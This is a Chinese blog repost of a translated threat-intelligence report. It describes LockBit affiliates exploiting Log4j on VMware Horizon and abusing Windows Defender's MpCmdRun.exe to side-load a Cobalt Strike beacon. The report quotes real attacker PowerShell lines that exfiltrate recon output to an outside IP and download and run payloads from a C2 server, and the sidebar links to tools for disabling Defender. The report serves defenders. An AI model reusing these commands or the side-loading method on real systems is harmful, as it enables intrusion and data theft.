依靠Windows Defender|LockBit勒索软件通过Microsoft安全工具侧面加载Cobalt Strike

最新推荐文章于 2024-04-26 13:55:34 发布
最新推荐文章于 2024-04-26 13:55:34 发布
阅读量343 收藏 1
点赞数
分类专栏: 内网渗透 文章标签: 安全 windows microsoft
原文链接:https://paper.seebug.org/1940/
版权

声明
出品|知道创宇(ID:404实验室)

以下内容,来自知道创宇404实验室翻译组作者原创,由于传播,利用此文所提供的信息而造成的任何直接或间接的后果和损失,均由使用者本人负责,长白山攻防实验室以及文章作者不承担任何责任。

前文

最近,LockBit受到了相当多的关注。上周,SentinelLabs报道了LockBit 3.0(又名LockBit Black),描述了这种日益流行的RaaS的最新迭代如何实现一系列反分析和反调试例程。我们的研究很快被其他报告类似发现的人跟进。

与此同时,早在4月份,SentinelLabs就报告了一家LockBit附属公司如何利用合法的VMware命令行工具VMwareXferlogs.exe来进行侧向加载Cobalt Strike。

在这篇文章中,我们将通过描述LockBit运营商或附属公司使用的另一种合法工具来追踪该事件,只是这次的问题工具属于安全工具:Windows Defender。在最近的调查中,我们发现黑客滥用Windows防御程序的命令行工具MpCmdRun.exe来解密和加载Cobalt Strike的有效载荷。

图片

概述

最初的目标泄露是通过针对未修补的VMWare Horizon服务器的Log4j漏洞发生的。攻击者使用此处记录的PowerShell代码修改了安装web shell的应用程序的Blast Secure Gateway组件。

一旦获得初始访问权限,黑客就执行一系列枚举命令,并试图运行多种开发后工具,包括Meterpreter、PowerShell Empire和一种侧载Cobalt Strike的新方法。

特别是在尝试执行Cobalt Strike时,我们观察到一个新的合法工具用于侧加载恶意DLL,它可以解密负载。

以前观察到的通过删除EDR/EPP的用户地挂钩、Windows事件跟踪和反恶意软件扫描接口来规避防御的技术也被观察到。

攻击链

图片

一旦攻击者通过Log4j漏洞获得初始访问权限,侦察就开始使用PowerShell执行命令,并通过对IP的POST base64编码请求过滤命令输出。侦察活动示例如下:

powershell -c curl -uri http://139.180.184[.]147:80 
met POST -Body ([System.Convert]
::ToBase64String
(([System.Text.Encoding]
::ASCII.GetBytes((whoami)))))
owershell -c curl -uri http://139.180.184[.]147:80 -
met POST -Body
([System.Convert]
::ToBase64String(([System.Text.Encoding]
::ASCII.GetBytes((nltest /domain_trusts)))
))

一旦攻击者获得足够的权限,他们就会尝试下载并执行多个攻击后有效载荷。

攻击者从其控制的C2下载恶意DLL、加密负载和合法工具:

powershell -c Invoke-WebRequest -uri 
http://45.32.108[.]
54:443/mpclient.dll -OutFile 
c:\windows\help\windows\mpclient.dll;
Invoke-WebRequest -uri 
http://45.32.108[.]54:443/c0000015.log -OutFile 
c:\windows\help\windows\c0000015.log;
Invoke-WebRequest -uri 
http://45.32.108[.]54:443/MpCmdRun.exe -OutFile 
c:\windows\help\windows\MpCmdRun.exe;
c:\windows\help\windows\MpCmdRun.exe

值得注意的是,攻击者利用合法的Windows Defender命令行工具MpCmdRun.exe来解密和加载Cobalt Strike有效载荷。

图片

我们还注意到用于下载Cobalt Strike有效载荷的IP地址和用于执行侦察的IP地址之间的相关性:在下载Cobalt Strike后不久,攻击者试图执行并将输出发送到以139开头的IP,如下面两个片段所示。

powershell -c Invoke-WebRequest -uri 
http://45.32.108[.]54:443/glib-2.0.dll -OutFile 
c:\users\public\glib-2.0.dll;
Invoke-WebRequest -uri 
http://45.32.108[.]54:443/c0000013.log -OutFile 
c:\users\public\c0000013.log;
Invoke-WebRequest -uri 
http://45.32.108[.]54:443/VMwareXferlogs.exe -OutFile 
c:\users\public\VMwareXferlogs.exe;
c:\users\public\VMwareXferlogs.exepowershell -c curl -uri 
http://139.180.184[.]147:80 
-met POST -Body ([System.Convert]::
ToBase64String(([System.Text.Encoding]
::ASCII.GetBytes((
c:\users\public\VMwareXferlogs.exe)))
))

与之前报告的 VMwareXferlogs.exe工具的侧加载相同的流程,MpCmd.exe被滥用来侧加载一个武器化的mpclient.dll,它从c0000015.log文件加载并解密Cobalt Strike信标。

因此,在攻击中使用的与使用Windows Defender命令行工具相关的组件有:

图片

总结

防御者需要警惕的是,LockBit勒索软件运营商和附属公司正在探索和利用新颖的离地攻击工具,以帮助他们加载Cobalt Strike信标和规避一些常见的EDR和传统的AV检测工具。

更重要的是,那些安全软件进行例外处理的工具,应接受仔细检查。像VMware和Windows Defender这样的产品在企业中非常普遍,如果被允许在安装的安全控制之外运行,它们对参与者的威胁会很大。

IoC

图片

欢迎关注长白山攻防实验室公众号
定期更新优质文章分享。

长白山攻防实验室
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
win10自带杀毒软件windows defender卸载工具
05-03
此方法适用于各种版本的windows10(专业版、企业版、教育版、ltsc2019、ltsb、1709、1803、1809及之后的版本)。此操作不可逆,请确认你不再需要Windows Defender功能。
勒索病毒解密工具
疏笃
07-08 1782
[777 Ransom] Trend Micro Ransomware解密器用来解密777勒索软件加密的文件 https://success.trendmicro.com/solution/1114221 [AES_NI Ransom] Rakhni解密器用来解密AES_NI勒索软件加密的文件 http://media.kaspersky.com/utilities/VirusUtilities/EN/rakhnidecryptor.zip [Agent.iih Ransom] Rakhni解密器用来解密A
勒索病毒不断升级,lockbit3.0版本。
a5854129的博客
06-26 853
是的,继lockbit勒索病毒在2019首次问世以来,犯罪份子已经成功将版本升级到了3.0版本,版本的升级,意味着病毒更加难缠算法更加强大,这为用户的网络安全带来了更大的危害。3、尽快联系专业的病毒清除公司,专业的病毒清除公司会根据电脑系统架构,使用多种病毒清除软件,对电脑系统进行清理,以便完全清除勒索病毒。5、联系安全机构,安全机构可以根据病毒的特征,对病毒进行定性,提供有针对性的解决方案,以便尽快清除勒索病毒。5. 注意网络安全:不要打开不熟悉的网站或邮件,不要下载来路不明的文件,以防止病毒的传播。
多家企业机密数据遭Lockbit3.0窃取,亚信安全发布《勒索家族和勒索事件监控报告》
亚信安全官方账号的博客
04-26 1083
亚信安全发布2024年第14期《勒索家族和勒索事件监控报告》,本周全球共监测到勒索事件87起,与上周相比勒索事件大幅下降。
LockBit勒索病毒生成器被泄露
pandazhengzheng的博客
02-06 1123
LockBit勒索病毒生成器被泄露
勒索事件翻倍!亚信安全发布《勒索家族和勒索事件监控报告》
亚信安全官方账号的博客
01-22 982
亚信安全发布2024年第3期《勒索家族和勒索事件监控报告》,本期共监测到勒索事件77起,相比上周增长1倍!
2023年LockBit勒索软件威胁不断增长
运维有小邓
09-26 116
在防御网络攻击方面,您必须保持主动性,面对日益扩大的攻击面和复杂的攻击技术。所以,为什么等呢?注册进行Log360的个性化演示,以了解更多信息。
第84篇:顶级加密勒索组织LockBit的深度剖析与技战法分析(上篇)
ABC_123的博客
01-07 1123
Part1 前言大家好,我是ABC_123。在过去的两年中,LockBit加密勒索组织的活动非常频繁,仅在美国他们就成功勒索了高达9100万美元。自2022年初至今,LockBit的运营者宣称已经渗透了全球500多个不同领域的组织,而LockBit 3.0及其变体更是成为了全球关注焦点的加密勒索软件。最近,LockBit组织利用了Citrix Bleed漏洞(CVE-2023-4966)攻击了...
关闭系统自带杀毒Windows Defender安全中心移除系统自带杀毒软件(防止软件被拦截打不开工具包)
最新发布
06-16
例如,当你需要运行一些特定的工具软件或一些从非官方渠道获取的软件时,Windows Defender 可能会将其视为潜在威胁而进行拦截,通过上述操作则能消除这种阻碍。同时,对于一些开发者来说,移除系统自带杀毒软件能让...
Windows Defender 彻底删除工具
09-05
Windows Defender彻底删除工具,可以彻底清除Windows Defender的相关服务和软件包,全部解压后以管理员身份运行cmd文件即可。
Windows Defender关闭工具
11-05
Defender Control v2.1 windowsWindows Defender, 手动几乎无法关闭;
BOF-DLL-Inject:使用Cobalt Strike的信标目标文件实现手动Map DLL注入
04-14
BOF-DLL-注入 BOF DLL注入是一个自定义的,该使用手动映射DLL注入以便将dll全部从内存迁移到进程中。 好处 不太可能被签名 DLL有效负载保留在内存中,永不接触磁盘 附加功能易于实现 DLL未在内核领域注册为包括EPROCESS结构的模块 笔记 要了解我如何开发此工具以及有关该工具的更多信息,请参阅我的博客
关闭Windows Defender Service工具
05-05
关闭Windows Defender Service工具
vmware archlinux vmware tools替代者Open-VM-Tools
lxyoucan的博客
04-19 5051
本文中安装的是Open-VM-Tools,安装起来比较方便。 VMware Tools 与 Open-VM-Tools 方案对比 2007 年,VMwareVMware Tools 中的大部分代码以 LGPL 协议发布,这就是 Open-VM-Tools。官方的 VMware Tools 不再单独向 Arch Linux 提供。 以往,VMware Tools 方案所提供的网络与储存驱动是最好的,而且还带有时间同步等功能。然而网络与 SCSI 驱动这部分代码已经早就合入 Linux 内核了。 VMwa
博客使用方法
justwaityou1314的博客
06-09 1537
这里写自定义目录标题欢迎使用Markdown编辑器新的改变功能快捷键合理的创建标题,有助于目录的生成如何改变文本的样式插入链接与图片如何插入一段漂亮的代码片生成一个适合你的列表创建一个表格设定内容居中、居左、居右SmartyPants创建一个自定义列表如何创建一个注脚注释也是必不可少的KaTeX数学公式新的甘特图功能,丰富你的文章UML 图表FLowchart流程图导出与导入导出导入 欢迎使用Markdown编辑器 你好! 这是你第一次使用 Markdown编辑器 所展示的欢迎页。如果你想学习如何使用Mar
LockBit2.0问世,面对勒索软件你需要知道这些
qq_42934452的博客
08-18 1441
LockBit又名“ABCD勒索软件”,LockBit最早出现在2019年9月,传播方式主要利用RDP弱口令爆破,利用大量扫描工具和暴力破解工具进行横向渗透,以扩大加密面积获得更多赎金。在过去两年一直以中国、印度、印度尼西亚、乌克兰、英国、法国、德国等国家的重要企业及政府组织作为攻击目标。 近日,全球IT咨询行业巨头埃森哲遭到LockBit的网络攻击,6TB的内部数据被窃取,2500台计算机遭遇宕机。 此次埃森哲遭遇的网络攻击,正是LockBit的2.0版本,相比第一代,Lo..
勒索病毒终极方案:不怕被加密,无惧被公开
云盒子企业云盘官方账号,17年专注文档安全
08-17 773
勒索病毒和企业的关系可谓相恨相杀,互相成长。 起初,勒索病毒团伙通过加密文件要求受害者支付赎金解密数据,但勒索病毒仅活跃了几年,这个老套路就被企业定期备份重要数据的方式给破解了。 当解密赚钱的道路越走越难,勒索病毒团伙又以公开或贩卖数据作为威胁,甚至对具有攻击价值、却又很难从外部突破的企业发展“内线”,访问攻击目标的内部网络。 最近非常活跃的勒索病毒软件LockBit2.0就是非常典型的例子。 被LockBit2.0加密文件及勒索信 上周,勒索病毒软件LockBit2.0攻击了全球IT咨询巨头
windows defender卸载工具
08-02
Windows DefenderWindows操作系统自带的防病毒和安全工具。它提供了一套完整的防护机制,包括实时保护、Automatic Sample Submission、Windows Hello等功能,可有效保护计算机免受恶意软件和网络攻击的侵害。然而,有时用户可能需要卸载Windows Defender,例如因为想安装其他第三方防病毒软件或出于其他个人原因。 想要卸载Windows Defender,可以按照以下步骤进行操作: 1. 打开Windows设置,方法是按下Win + I快捷键,或者点击“开始”菜单并选择“设置”。 2. 在设置窗口中,选择“更新和安全”。 3. 在左侧菜单中,选择“Windows 安全”。 4. 在右侧窗口中,找到并点击“打开Windows 安全中心”链接。 5. 在Windows安全中心窗口中,找到并点击“病毒和威胁防护设置”。 6. 在病毒和威胁防护设置窗口中,找到“实时保护”,点击右侧的“管理设置”。 7. 在实时保护设置窗口中,将实时保护开关关闭。 8. 关闭实时保护后,返回到病毒和威胁防护设置窗口,点击“查看防病毒和威胁防护历史记录”。 9. 在历史记录窗口中,找到“灾难恢复”选项,点击“清除”。 10. 清除灾难恢复后,返回病毒和威胁防护设置窗口,找到并点击“应用程序和浏览器控制”。 11. 在应用程序和浏览器控制窗口中,将“应用和文件检查”开关关闭。 12. 关闭应用和文件检查后,返回病毒和威胁防护设置窗口,点击“家庭网络”链接。 13. 在家庭网络窗口中,将“家庭网络”开关关闭。 完成以上步骤后,Windows Defender将被禁用。如果需要完全卸载Windows Defender,可以通过更改注册表或使用专门的卸载工具来进行操作。值得注意的是,禁用或卸载Windows Defender可能会导致计算机的安全性下降,因此在卸载之前应确保计算机上已安装其他有效的安全软件

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值